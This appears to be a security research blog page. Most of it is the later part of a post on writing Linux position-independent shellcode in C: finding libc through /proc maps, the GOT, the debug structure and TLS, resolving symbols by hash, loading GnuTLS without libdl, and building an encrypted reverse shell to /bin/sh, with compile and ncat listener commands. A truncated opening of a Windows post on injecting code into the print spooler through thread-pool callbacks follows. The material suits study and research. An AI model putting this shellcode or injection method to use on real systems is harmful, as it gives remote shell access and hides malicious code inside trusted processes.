     1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __ctype_toupper_loc@GLIBC_2.3 (2)
     2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __uflow@GLIBC_2.2.5 (3)
     3: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (3)
     4: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND sigprocmask@GLIBC_2.2.5 (3)
     5: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __snprintf_chk@GLIBC_2.3.4 (4)
     6: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND raise@GLIBC_2.2.5 (3)
     7: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND free@GLIBC_2.2.5 (3)
     8: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND abort@GLIBC_2.2.5 (3)
     9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND __errno_location@GLIBC_2.2.5 (3)
    10: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND strncmp@GLIBC_2.2.5 (3)

6. Base of C Library

Although I describe obtaining the base address of the host process in section 4, it’s only necessary to obtain the base address of libc.so. We will now examine a number of ways to do this.

6.1 Process Maps File (procfs)

A popular method is by parsing /proc/[pid]/maps where [pid] is the target process id. Using “self” in place of [pid] will query the current process space.

int read_line(int fd, char *buf, int buflen) {
    int  len;
    
    if(buflen==0) return 0;
    
    for(len=0; len < (buflen - 1); len++) {
      // read a byte. exit on error
      if(!_read(fd, &buf[len], 1)) break;
      // exit loop when new line found
      if(buf[len] == '\n') {
        buf[len] = 0;
        break;
      }
    }
    return len;
}

int is_exec(char line[]) {
    char *s = line;
    
    // find the first space
    // but ensure we don't skip newline or null terminator
    while(*s && *s != '\n' && *s != ' ') s++;
    
    // space?
    if(*s == ' ') {
      do {
        s++; // skip 1
        // execute flag?
        if(*s == 'x') return 1;
      // until we reach null terminator, newline or space
      } while (*s && *s != '\n' && *s != ' ');
    }
    return 0;
}

void *get_module_handle1(const char *module) {
    int  maps;
    void *base=NULL, *start_addr;
    char line[PATH_MAX];
    int  str[8], len;
    
    // /proc/self/maps
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;
    
    // 1. open /proc/self/maps
    maps = _open((char*)str, O_RDONLY, 0);
    if(!maps) return NULL;
    
    // 2. until EOF or module found
    for(;;) {
      // 3. read a line
      len = read_line(maps, line, BUFSIZ);
      if(len == 0) break;
      // 4. remove last character
      line[len] = 0;
      // if permissions disallow execution, skip it
      if(!is_exec(line)) {
        continue;
      }
      start_addr = (void*)hex2bin(line);
      // 5. first address should be the base of host process
      // if no module is requested, return this address
      if(module == 0) {
        base = start_addr;
        break;
      }
      // 6. check if module name is in line
      if(_strstr(line, module)) {
        base = start_addr;
        break;
      }
    }
    _close(maps);
    return base;
}

6.2 Global Offset Table (DT_PLTGOT)

In May 2002, the grugq provided an an example of how to locate the link_map structure stored in the GOT that can then be used to resolve the base address of libc.so. In 2007, herm1t shows another way in INT 0x80? No, thank you! that finds it using the address of libc.so functions rather than the link_map. Either way works, but the method shown here is based on the post by the grugq. The following structure defines the link_map. Note, the structure defined in link.h is much more detailed, but this is really all that’s required to obtain the base address of shared objects.

struct link_map {
    ElfW(Addr) l_addr;		/* Difference between the address in the ELF
				   file and the addresses in memory.  */
    char *l_name;		/* Absolute file name object was found in.  */
    ElfW(Dyn) *l_ld;		/* Dynamic section of the shared object.  */
    struct link_map *l_next, *l_prev; /* Chain of loaded objects.  */
};

The link_map can be found in various ways, but the most popular seems to be via dynamic structures of type DT_PLTGOT and DT_DEBUG.

GOT Index Description
0 Relative Virtual Address of .dynamic program header (PT_DYNAMIC)
1 Pointer to link_map structure.
2 Pointer to _dl_runtime_resolve function in dynamic linker/loader

The following function will retrieve the address of GOT, extract a pointer to the link_map structure and search for the requested module based on string. If no module is provided, the first entry in the list (which happens to be host process) is returned. This is similar to how GetModuleHandle works on windows. However, it’s worth noting that because of how shared objects on Linux are named, the module name provided to this function doesn’t need to be exact. A partial name is sufficient, but that makes it more prone to return the wrong entry.

void *get_module_handle2(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    void            *addr=NULL, *base;
    uint64_t        *ptrs;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      got = elf_get_dyn(base, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.3 Debug Structure (DT_DEBUG)

The link_map is also available via the debug type or DT_DEBUG.

struct r_debug {
    int32_t r_version;          /* version, always one */
    struct link_map * r_map;    /* list of loaded libraries */
    void (*r_brk)(void);        /* marker function address */
    int32_t r_state;            /* zero if the state of r_map is consistent */
    uintptr_t r_ldbase;         /* linker base address (this is where the linker was loaded after relocation) */
};

The following code shows how to resolve using DT_DEBUG. It’s essentially the same as get_module_handle2 that uses DT_PLTGOT. In fact, it might be possible to use the same function for two separate types if we only use 64-bit pointers assuming r_version is aligned by 8 bytes.

void *get_module_handle3(const char *module) {
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *dbg;
    void            *addr=NULL, *base;
    struct r_debug  *debug;
    struct link_map *map;
    
    // 1. get the base of host ELF
    base = get_base();    
    // 2. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(base, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 3. obtain global offset table
      dbg = elf_get_dyn(base, DT_DEBUG);
      if(dbg != NULL) {
        debug = (struct r_debug*)dbg->d_un.d_ptr;
        map   = (struct link_map *)debug->r_map;
        // 4. search through link_map for module
        while (map != NULL) {
          // 5 if no module provided, return first in the list
          if(module == NULL) {
            addr = (void*)map->l_addr;
            break;
          // otherwise, check by name
          } else if(_strstr(map->l_name, module)) {
            addr = (void*)map->l_addr;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    return addr;
}

6.4 Thread Local Storage (TLS)

herm1t writes in Highway to libc that a pointer to TLS memory for glibc can be found in the Thread Control Block (TCB) accessible via the gs register on 32-bit systems or the fs register on 64-bit systems. If you look at the value of fs on a 64-bit system, it appears to be empty. Accessing fs will still return information from the TCB, but at least on my 64-bit system, it did not contain an address for TLS as expected. While the approach described by herm1t didn’t work on this system, there are some interesting addresses at negative offsets. Read A Deep dive into (implicit) Thread Local Storage for more detailed information on TLS.

  fs-8*7  : main_arena                - heap memory
  fs-8*10 : _nl_C_LC_CTYPE_class
  fs-8*11 : _nl_C_LC_CTYPE_toupper
  fs-8*12 : _nl_C_LC_CTYPE_tolower
  fs-8*14 : _res
  fs-8*15 : _nl_global_locale

The following code will use _nl_C_LC_CTYPE_class to locate the base address of libc.so on my own system, but may not work elsewhere without modification.

void *get_base2(void) {
    uint64_t *fs, base;
    
    // retrieve the address of _nl_C_LC_CTYPE_class
    asm ("mov %%fs:0xffffffffffffffb0,%%rax":"=a"(fs));
    
    base = (uint64_t)fs;
    
    // align down
    base &= -4096;
    
    // equal to ELF?
    while (*(uint32_t*)base != 0x464c457fUL) {
      base -= 4096;
    }
    return (void*)base;
}

Another way simply using the pointer to TCB is presented. It uses a brute force approach and works for dynamic and statically linked binaries. Again, this was tested on my system and may require modification. It works by first obtaining a file descriptor to /dev/random and if it can successfully write the contents of address we want to read, we check for the ELF file header.

void *get_base3(void) {
    uint64_t base;
    int      fd, str[4];
    
    asm ("mov %%fs:0,%%rax" : "=a" (base));
    
    // align down
    base &= -4096;
    
    // "/dev/random"
    str[0] = 0x7665642f;
    str[1] = 0x6e61722f;
    str[2] = 0x006d6f64;

    fd = _open((char*)str, O_WRONLY, 0);
    
    for(;;) {
      if(_write(fd, (char*)base, 4) == 4) {
        if (*(uint32_t*)base == 0x464c457fUL) {
          break;
        }
      }
      base -= 4096;
    }
    _close(fd);
    
    return (void*)base;
}

7. Resolving Address of Functions

At this point we should have the base address of host process and the base address of libc. However, even if you only managed to retrieve the base address of libc, that would be sufficient to do everything else.

7.1 ELF Hash Table (DT_HASH)

Instead of repeating information already available, let me refer you to a couple of posts about this.

  1. Hashin’ the elves by herm1t
  2. ELF: symbol lookup via DT_HASH by FLAPENGUIN

The following code is derived from those two posts.

uint32_t elf_hash(const uint8_t *name) {
    uint32_t h = 0, g;
    
    while (*name) {
      h = (h << 4) + *name++;
      g = h & 0xf0000000;
      if (g)
        h ^= g >> 24;
      h &= ~g;
    }
    return h;
}

void *elf_lookup(
  const char *name, 
  uint32_t *hashtab, 
  Elf64_Sym *sym, 
  const char *str) 
{
    uint32_t  idx;
    uint32_t  nbuckets = hashtab[0];
    uint32_t* buckets  = &hashtab[2];
    uint32_t* chains   = &buckets[nbuckets];
    
    for(idx = buckets[elf_hash(name) % nbuckets]; 
        idx != 0; 
        idx = chains[idx]) 
    {
      // does string match for this index?
      if(!_strcmp(name, sym[idx].st_name + str))
        // return address of function
        return (void*)sym[idx].st_value;
    }
    return NULL;
}

7.2 GNU Hash Table (DT_GNU_HASH)

In June 2006, support for the DT_GNU_HASH table was added and this apparently speeds up searches by 50%. The hash function was posted to comp.lang.c all the way back in 1991 by Dan Bernstein. Deroko from ARTeam discusses it here while FLAPENGUIN discusses it here. The following code is derived from the post by FLAPENGUIN.

#define ELFCLASS_BITS 64

uint32_t gnu_hash(const uint8_t *name) {
    uint32_t h = 5381;

    for(; *name; name++) {
      h = (h << 5) + h + *name;
    }
    return h;
}

struct gnu_hash_table {
    uint32_t nbuckets;
    uint32_t symoffset;
    uint32_t bloom_size;
    uint32_t bloom_shift;
    uint64_t bloom[1];
    uint32_t buckets[1];
    uint32_t chain[1];
};

void* gnu_lookup(
    const char* name,          /* symbol to look up */
    const void* hash_tbl,      /* hash table */
    const Elf64_Sym* symtab,   /* symbol table */
    const char* strtab         /* string table */
) {
    struct gnu_hash_table *hashtab = (struct gnu_hash_table*)hash_tbl;
    const uint32_t  namehash    = gnu_hash(name);

    const uint32_t  nbuckets    = hashtab->nbuckets;
    const uint32_t  symoffset   = hashtab->symoffset;
    const uint32_t  bloom_size  = hashtab->bloom_size;
    const uint32_t  bloom_shift = hashtab->bloom_shift;
    
    const uint64_t* bloom       = (void*)&hashtab->bloom;
    const uint32_t* buckets     = (void*)&bloom[bloom_size];
    const uint32_t* chain       = &buckets[nbuckets];

    uint64_t word = bloom[(namehash / ELFCLASS_BITS) % bloom_size];
    uint64_t mask = 0
        | (uint64_t)1 << (namehash % ELFCLASS_BITS)
        | (uint64_t)1 << ((namehash >> bloom_shift) % ELFCLASS_BITS);

    if ((word & mask) != mask) {
        return NULL;
    }

    uint32_t symix = buckets[namehash % nbuckets];
    if (symix < symoffset) {
        return NULL;
    }

    /* Loop through the chain. */
    for (;;) {
        const char* symname = strtab + symtab[symix].st_name;
        const uint32_t hash = chain[symix - symoffset];        
        if (namehash|1 == hash|1 && _strcmp(name, symname) == 0) {
            return (void*)symtab[symix].st_value;
        }
        if(hash & 1) break;
        symix++;
    }
    return 0;
}

7.3 Dynamic Symbol Table (DT_SYMTAB, DT_DYNSYM)

The following function works similar to GetProcAddress on Windows and dlsym on Linux. Given a base address and name of function, lookup the virtual address of function using the hash table.

void *get_proc_address(void *module, void *name) {
    Elf64_Dyn  *symtab, *strtab, *hash;
    Elf64_Sym  *syms;
    char       *strs;
    void       *addr = NULL;
    
    // 1. obtain pointers to string and symbol tables
    strtab = elf_get_dyn(module, DT_STRTAB);
    symtab = elf_get_dyn(module, DT_SYMTAB);
    
    if(strtab == NULL || symtab == NULL) return NULL;
    
    // 2. load virtual address of string and symbol tables
    strs = (char*)strtab->d_un.d_ptr;
    syms = (Elf64_Sym*)symtab->d_un.d_ptr;
    
    // 3. try obtain the ELF hash table
    hash = elf_get_dyn(module, DT_HASH);
    
    // 4. if we have it, lookup symbol by ELF hash
    if(hash != NULL) {
      addr = elf_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
    } else {
      // if we don't, try obtain the GNU hash table
      hash = elf_get_dyn(module, DT_GNU_HASH);
      if(hash != NULL) {
        addr = gnu_lookup(name, (void*)hash->d_un.d_ptr, syms, strs);
      }
    }
    // 5. did we find symbol? add base address and return
    if(addr != NULL) {
      addr = (void*)((uint64_t)module + addr);
    }
    return addr;
}

This approach requires using the hash table, but in the next example, I’ll show a method similar to what’s used in Windows shellcode.

7.4 Using Hash Algorithm (SHT_SYMTAB, SHT_DYNSYM)

Another way to lookup the address of a function that is by using the section headers. get_proc_address2 given the base of a module will obtain the path of library and pass it to get_proc_address3 that will then search the symbol table using a hash of the function name. get_proc_address3 is primarily for statically linked binaries.

// lookup by hash using the base address of module
void *get_proc_address2(void *module, uint32_t hash) {
    char            *path=NULL;
    Elf64_Phdr      *phdr;
    Elf64_Dyn       *got;
    uint64_t        *ptrs, addr;
    struct link_map *map;
    
    if(module == NULL) return NULL;
    
    // 1. obtain pointer to dynamic program header
    phdr = (Elf64_Phdr*)elf_get_phdr(module, PT_DYNAMIC);
    
    if(phdr != NULL) {
      // 2. obtain global offset table
      got = elf_get_dyn(module, DT_PLTGOT);
      if(got != NULL) {
        ptrs = (uint64_t*)got->d_un.d_ptr;
        map   = (struct link_map *)ptrs[1];
        // 3. search through link_map for module
        while (map != NULL) {
          // this our module?
          if(map->l_addr == (uint64_t)module) {
            path = map->l_name;
            break;
          }
          map = (struct link_map *)map->l_next;
        }
      }
    }
    // not found? exit
    if(path == NULL) return NULL;
    addr = (uint64_t)get_proc_address3(path, hash);
    
    return (void*)((uint64_t)module + addr); 
}

// lookup by hash using the path of library (static lookup)
void* get_proc_address3(const char *path, uint32_t hash) {
    int         i, fd, cnt=0;
    Elf64_Ehdr *ehdr;
    Elf64_Phdr *phdr;
    Elf64_Shdr *shdr;
    Elf64_Sym  *syms=0;
    void       *addr=NULL;
    char       *strs=0;
    uint8_t    *map;
    struct stat fs;
    int         str[8];
    
    // /proc/self/exe
    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x652f666c;
    str[3] = 0x00006578;

    // open file
    fd = _open(path == NULL ? (char*)str : path, O_RDONLY, 0);
    if(fd == 0) return NULL;
    // get the size
    if(_fstat(fd, &fs) == 0) {
      // map into memory
      map = (uint8_t*)_mmap(NULL, fs.st_size,  
        PROT_READ, MAP_PRIVATE, fd, 0);
      if(map != NULL) {
        ehdr = (Elf64_Ehdr*)map;
        shdr = (Elf64_Shdr*)(map + ehdr->e_shoff);
        // locate static or dynamic symbol table
        for(i=0; i<ehdr->e_shnum; i++) {
          if(shdr[i].sh_type == SHT_SYMTAB ||
             shdr[i].sh_type == SHT_DYNSYM) {
            strs = (char*)(map + shdr[shdr[i].sh_link].sh_offset);
            syms = (Elf64_Sym*)(map + shdr[i].sh_offset);
            cnt  = shdr[i].sh_size/sizeof(Elf64_Sym);
          }
        }
        // loop through string table for function
        for(i=0; i<cnt; i++) {
          // if found, save address
          if(gnu_hash(&strs[syms[i].st_name]) == hash) {
            addr = (void*)syms[i].st_value;
          }
        }
        _munmap(map, fs.st_size);
      }
    }
    _close(fd);
    return addr;
}

8. Loading Shared Objects

The normal way to load a shared object and resolve the address of a function is via dlopen and dlsym respectively. Both of these functions are exported by libdl.so – the dynamic linking library. For my build of Debian, libc.so doesn’t use code inside libdl.so because the mechanics of loading libraries and resolving functions are actually within ld.so – the dynamic linker/loader. This loader also doesn’t export or make publicly available either of the functions required, but pointers to the real functions can be found in a read-only shared area of memory called _rtld_global_ro that is exposed via the symbol table. This is a structure defined in /sysdeps/generic/ldsodefs.h that when compiled with SHARED defined will include pointers to the dynamic loading functions.

8.1 __libc_dlopen_mode and __libc_dlsym

Before discussing anything about _rtld_global_ro, you can find functions in the symbol table of libc.so that allow you to dynamically load shared objects without using libdl.so

user@nostromo:~/hub/shellcode$ readelf /lib/x86_64-linux-gnu/libc-2.24.so -s |grep -i "__libc_dl"
  1165: 000000000011fa60    17 FUNC    GLOBAL DEFAULT   13 __libc_dl_error_tsd@@GLIBC_PRIVATE
  1216: 000000000011f4b0    35 FUNC    GLOBAL DEFAULT   13 __libc_dlclose@@GLIBC_PRIVATE
  2043: 000000000011f440   100 FUNC    GLOBAL DEFAULT   13 __libc_dlsym@@GLIBC_PRIVATE
  2152: 000000000011f3f0    80 FUNC    GLOBAL DEFAULT   13 __libc_dlopen_mode@@GLIBC_PRIVATE

To load libraries, we need to resolve the address of __libc_dlopen_mode and if we want to resolve the address of functions by string, we also need __libc_dlsym. The following code shows how you might load libgnutls.so using a static path.

  void *clib, *gnutls;
  
  // 1. resolve the address of _dl_addr in libc.so
  clib = get_module_handle("libc");
  _dl_open = (dl_open_t)get_proc_address(clib, "__libc_dlopen_mode");
  
  // 2. load gnutls
  gnutls = _dl_open("/usr/lib/x86_64-linux-gnu/libgnutls.so", RTLD_LAZY);

Now onto the _rtld_global_ro object that may be of interest to you. The following shows the function pointers for dynamic loading. Depending on the version of glibc, the structure itself can differ in size. I was curious to see if it was possible to find _dl_open using this object in the event __libc_dlopen_mode was not available for any reason.

user@nostromo:~/hub/shellcode$ readelf -s /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 |grep -i "rtld_global_ro"
    25: 0000000000223ca0   376 OBJECT  GLOBAL DEFAULT   16 _rtld_global_ro@@GLIBC_PRIVATE
#ifdef SHARED
  // We add a function table to _rtld_global which is then used to
  //   call the function instead of going through the PLT.  The result
  //   is that we can avoid exporting the functions and we do not jump
  //   PLT relocations in libc.so.
  
  void (*_dl_debug_printf) (const char *, ...)
       __attribute__ ((__format__ (__printf__, 1, 2)));
  
  int (internal_function *_dl_catch_error) (const char **, const char **,
					    bool *, void (*) (void *), void *);
  
  void (internal_function *_dl_signal_error) (int, const char *, const char *,
					      const char *);
  
  void (*_dl_mcount) (ElfW(Addr) frompc, ElfW(Addr) selfpc);
  
  lookup_t (internal_function *_dl_lookup_symbol_x) (const char *,
						     struct link_map *,
						     const ElfW(Sym) **,
						     struct r_scope_elem *[],
						     const struct r_found_version *,
						     int, int,
						     struct link_map *);
                 
  int (*_dl_check_caller) (const void *, enum allowmask);
  
  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,
		     Lmid_t nsid, int argc, char *argv[], char *env[]);
  
  void (*_dl_close) (void *map);
  
  void *(*_dl_tls_get_addr_soft) (struct link_map *);
  
#ifdef HAVE_DL_DISCOVER_OSVERSION
  int (*_dl_discover_osversion) (void);
#endif

You can view the data for a process under GDB if you know the address of _rtld_global_ro.

(gdb) x/40xg 0x7ffff7ffcca0
0x7ffff7ffcca0 <_rtld_global_ro>:     0x0004099000000000  0x00007fffffffe4d9
0x7ffff7ffccb0 <_rtld_global_ro+16>:  0x0000000000000006  0x0000000000001000
0x7ffff7ffccc0 <_rtld_global_ro+32>:  0x0000000000000000  0x00007ffff7fcca30
0x7ffff7ffccd0 <_rtld_global_ro+48>:  0x0000000000000004  0x0000000000000064
0x7ffff7ffcce0 <_rtld_global_ro+64>:  0x0000000100000002  0x0000000000000000
0x7ffff7ffccf0 <_rtld_global_ro+80>:  0x000003030000037f  0x00000000bfebfbff
0x7ffff7ffcd00 <_rtld_global_ro+96>:  0x0000000000000000  0x00007fffffffe390
0x7ffff7ffcd10 <_rtld_global_ro+112>: 0x0000001600000001  0x02100800000406e3
0x7ffff7ffcd20 <_rtld_global_ro+128>: 0xbfebfbff7ffafbbf  0x029c67af00000000
0x7ffff7ffcd30 <_rtld_global_ro+144>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd40 <_rtld_global_ro+160>: 0x0000000000000000  0x0000004e00000006
0x7ffff7ffcd50 <_rtld_global_ro+176>: 0x00000000000003c0  0x000000000034ccf1
0x7ffff7ffcd60 <_rtld_global_ro+192>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd70 <_rtld_global_ro+208>: 0x0000000000000000  0x0000000000000000
0x7ffff7ffcd80 <_rtld_global_ro+224>: 0x00007ffff7df503c  0x0000000000000000
0x7ffff7ffcd90 <_rtld_global_ro+240>: 0x0000000000000000  0x00007ffff7ffec28
0x7ffff7ffcda0 <_rtld_global_ro+256>: 0x00007ffff7ffa000  0x00007ffff7ffe708
0x7ffff7ffcdb0 <_rtld_global_ro+272>: 0x0000000000000000  0x00007ffff7de9630
0x7ffff7ffcdc0 <_rtld_global_ro+288>: 0x00007ffff7de85d0  0x00007ffff7de8390
0x7ffff7ffcdd0 <_rtld_global_ro+304>: 0x00007ffff7deaa30  0x00007ffff7de2ea0

Using some simple code, we can identify with _dl_addr the addresses that belong to ld-linux.

typedef struct {
  const char *dli_fname;  // File name of defining object.   
  void       *dli_fbase;  // Load address of that object.    
  const char *dli_sname;  // Name of nearest symbol.         
  void       *dli_saddr;  // Exact value of nearest symbol.  
} Dl_info;

typedef int (*dl_addr_t)(
  const void *address, 
  Dl_info *info, 
  struct link_map **mapp, 
  const Elf64_Sym **symbolp);
  
  -------------------------------
    dl_addr_t _dl_addr;
    void      *clib, *ld;
    uint64_t  *rtld;
    DL_info   info;
    
    // 1. resolve the address of _dl_addr in libc.so
    clib = get_module_handle("libc");
    _dl_addr = (dl_addr_t)get_proc_address(clib, "_dl_addr");
    
    // 2. resolve the address of _rtld_global_ro in ld-linux.so
    ld = get_module_handle("ld-linux");
    rtld = (uint64_t*)get_proc_address(ld, "_rtld_global_ro");
    
    // 3. try the first 64 entries
    for(i=0;i<64;i++) {
      if(_dl_addr((void*)rtld[i], &info, &map, &sym)) {
        const char *str = info.dli_sname ? : "N/A";
        printf("[%i] %p : %-10s : %s \n", 
          i, rtld[i], str, info.dli_fname);
      }
    }

Below shows basic output using the above code.

[28] 0x7f5dde45c03c : N/A        : /lib64/ld-linux-x86-64.so.2 
[32] 0x7ffd6d904000 : LINUX_2.6  : linux-vdso.so.1 
[35] 0x7f5dde450630 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_printf 
[36] 0x7f5dde44f5d0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_catch_error
[37] 0x7f5dde44f390 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_signal_error
[38] 0x7f5dde451a30 : _dl_mcount : /lib64/ld-linux-x86-64.so.2  // _dl_mcount
[39] 0x7f5dde449ea0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_lookup_symbol_x
[40] 0x7f5dde452fc0 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_check_caller
[41] 0x7f5dde453540 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_open
[42] 0x7f5dde455560 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_close
[43] 0x7f5dde452b40 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_tls_get_addr_soft
[44] 0x7f5dde457b80 : N/A        : /lib64/ld-linux-x86-64.so.2  // _dl_discover_osversion

In this instance, we know the address of _dl_open will be at _rtld_global_ro + 41*8. It’s certainly possible to call the function, but internally is a check for where the call originated from. dl_check_caller will determine if the call originated from a valid Dynamic Shared Object (DSO).

// Bit masks for the objects which valid callers can come from to
//   functions with restricted interface.  
enum allowmask {
    allow_libc = 1,
    allow_libdl = 2,
    allow_libpthread = 4,
    allow_ldso = 8
  };

The following is a snippet of the code to validate a caller from elf/dl-caller.c.

static void dl_open_worker (void *a) {
  struct dl_open_args *args = a;
  const char *file = args->file;
  int mode = args->mode;
  struct link_map *call_map = NULL;

  // Check whether _dl_open() has been called from a valid DSO.
  if (__check_caller (args->caller_dl_open,
		      allow_libc|allow_libdl|allow_ldso) != 0)
    _dl_signal_error (0, "dlopen", NULL, N_("invalid caller"));

As you can see, only libc.so, libdl.so and ld.so are permitted to load a library. Bypassing this check is trivial, but thankfully not required because libc.so exports __libc_dlopen_mode

8.2 Parsing /etc/ld.so.conf

A list of shared libraries are stored in /etc/ld.so.cache and a list of trusted paths can be found in /etc/ld.so.conf. If you wanted to map a library into memory without knowing the full path, one way would be checking each of the entries in cache or by appending the name of a library to each of the paths found in the configuration file. For this shellcode, all libraries required are stored in the cache list and dlopen doesn’t require a full path.

9. Reverse Shell using SSL/TLS

The reverse shell uses synchronization so that it’s possible to create a sub process running /bin/sh with stdin,stdout and stderr being redirected through anonymous pipes. We then monitor I/O signals on those anonymous pipes and a TCP socket. This allows us to encrypt/decrypt using the GNU TLS functions. It is based on epl.c that does not use any encryption for interacting with /bin/sh.

9.1 Data Table

Since we can’t use any global variables for a PIC, everything is stored on the stack. To manage this data more efficiently, I’ve defined a structure that contains all the pointers to functions and variables for various operations should it be required by other subroutines.

typedef struct _data_t {
    int s;       // socket file descriptor

    union {
      uint64_t hash[64];
      void     *addr[64];
      struct {
        // gnu c library functions
        pipe_t          _pipe;
        fork_t          _fork;
        socket_t        _socket;
        // .... snipped
      };
    } api;
} data_t;

9.2 Strings

Declaring strings is a slight problem for a shellcode because gcc will move them all to a read-only segment (.rodata) that is separate from the (.text) segment. There are a few ways to work around this. elfmaster suggests using the -N option of the linker ld to combine all segments into one. fishstiqz uses a combination of macros and inline assembly. What I do is declare an array of integers large enough to hold the string. That array is then initialized using the string converted to integers. gcc should do this automatically, but it’s currently not an option. The following code demonstrates the idea where len is initialized to the length of string and str is an empty array of integers. i.e int str[16];

    int *str;
    
    len = strlen(input);
    str = (int*)input;
    
    // align up by 4
    len = (len & -4) + 4;
    len >>= 2;
    
    for(i=0;i<len;i++) {
      printf("str[%i] = 0x%08lx;\n", i, str[i]);
    }

As an example, the string “/proc/self/maps” becomes:

    str[0] = 0x6f72702f;
    str[1] = 0x65732f63;
    str[2] = 0x6d2f666c;
    str[3] = 0x00737061;
    str[4] = 0;

One might also consider storing all strings in a separate block of data that is then simply passed to each subroutine as a parameter.

9.3 Compiling

A Makefile is provided to compile and extract the shellcode automatically. It uses gcc to compile and objcopy to extract. xxd then converts the binary in tls.bin to a C style string and redirects output to tls.h. Don’t forget that tls.c uses port 1234 and 127.0.0.1 as the peer address because it’s only a proof of concept.

  gcc -O0 -nostdlib -fpic tls.c -o tls
  objcopy -O binary --only-section=.text tls tls.bin
  xxd -i tls.bin > tls.h

The gcc option -O0 implies disabling optimizations. -nostdlib implies not using any standard library functions and -fpic implies generating position-independent code. Objcopy simply extracts the executable code stored in the .text segment.

9.4 Testing

ncat, that comes bundled with nmap supports raw I/O using TLS/SSL. The following will listen for incoming SSL/TLS connections on port 1234 using any ipv4 interface.

  ncat -lvk4 1234 --ssl

runsc.c can be used to execute the code from memory.

  runsc -x -f tls.bin

10. Summary

As you can see, it’s entirely possible to avoid using pure assembly code for a PIC. Admittedly, some assembly is used here to workaround limitations of C itself, but would be completely avoidable if the C code was supplied with a valid address of the host process, libc.so or any other shared object. Sources can be found here.

Posted in assembly, linux, shellcode | Tagged , , , , | Leave a comment

Windows Process Injection: Print Spooler

Introduction

Every application running on the windows operating system has a thread pool or a “worker factory” and this internal mechanism allows an application to offload management of threads typically used for asynchronous operations. The automation of thread management facilitates the support of callback functions in response to I/O events or a timer expiring. Imagine you have a process that needs to send and receive data over the network. Do we want the application to wait indefinitely to receive something from the network? ..or do we want to perform other tasks simultaneously? Thread pooling enables more efficient management of threads and specifically asynchronous callback procedures. These functions can be patched in memory and this allows one to inadvertently execute code without the creation of a new thread. Figure 1 shows notepad running under the spooler process after being patched with shellcode and invoked using print spooler API.

Figure 1. Notepad running under spooler process.

Finding Callback Environments

Callback functions are stored in mostly opaque/undocumented structures that I haven’t taken the time to fully document here because my main objective is to perform code injection. For the print spooler, we’re only interested in the TP_ALPC structure that is used by TppAlpcpExecuteCallback located in NTDLL.dll. This function dispatches printer requests via the LPC port to LrpcIoComplete located in RPCRT4.dll. TP_ALPC contains a TP_CALLBACK_ENVIRON structure or what I’ll refer to as CBE from now on. CBEs can be found in both the stack and heap memory space of a process, so the virtual memory we need to scan has the following memory attributes.

  • State is MEM_COMMIT
  • Type is MEM_PRIVATE
  • Protect is PAGE_READWRITE

The data we’re looking for can be interepreted using the following structure.

typedef struct _TP_CALLBACK_ENVIRON_V3 {
    TP_VERSION                         Version;
    PTP_POOL                           Pool;
    PTP_CLEANUP_GROUP                  CleanupGroup;
    PTP_CLEANUP_GROUP_CANCEL_CALLBACK  CleanupGroupCancelCallback;
    PVOID                              RaceDll;
    struct _ACTIVATION_CONTEXT        *ActivationContext;
    PTP_SIMPLE_CALLBACK                FinalizationCallback;
    union {
        DWORD                          Flags;
        struct {
            DWORD                      LongFunction :  1;
            DWORD                      Persistent   :  1;
            DWORD                      Private      : 30;
        } s;
    } u;
    TP_CALLBACK_PRIORITY               CallbackPriority;
    DWORD                              Size;
} TP_CALLBACK_ENVIRON_V3;

However, in memory, two additional pointers are required. One is the actual callback function and the other is a callback parameter. It is likely a separate structure that also appears to be undocumented.

00000000`011fbd08  00000000`00000001 ; Version
00000000`011fbd10  00007ffc`b50c0680 ntdll!TppAlpcpCleanupGroupMemberVFuncs ; Pool
00000000`011fbd18  00000000`00000000 ; CleanupGroup
00000000`011fbd20  00000000`00000000 ; CleanupGroupCancelCallback
00000000`011fbd28  00000000`00000000 ; RaceDll
00000000`011fbd30  00000000`011fbd30 ; ActivationContext
00000000`011fbd38  00000000`011fbd30 ; FinalizationCallback
00000000`011fbd40  00000000`00000000 ; Flags
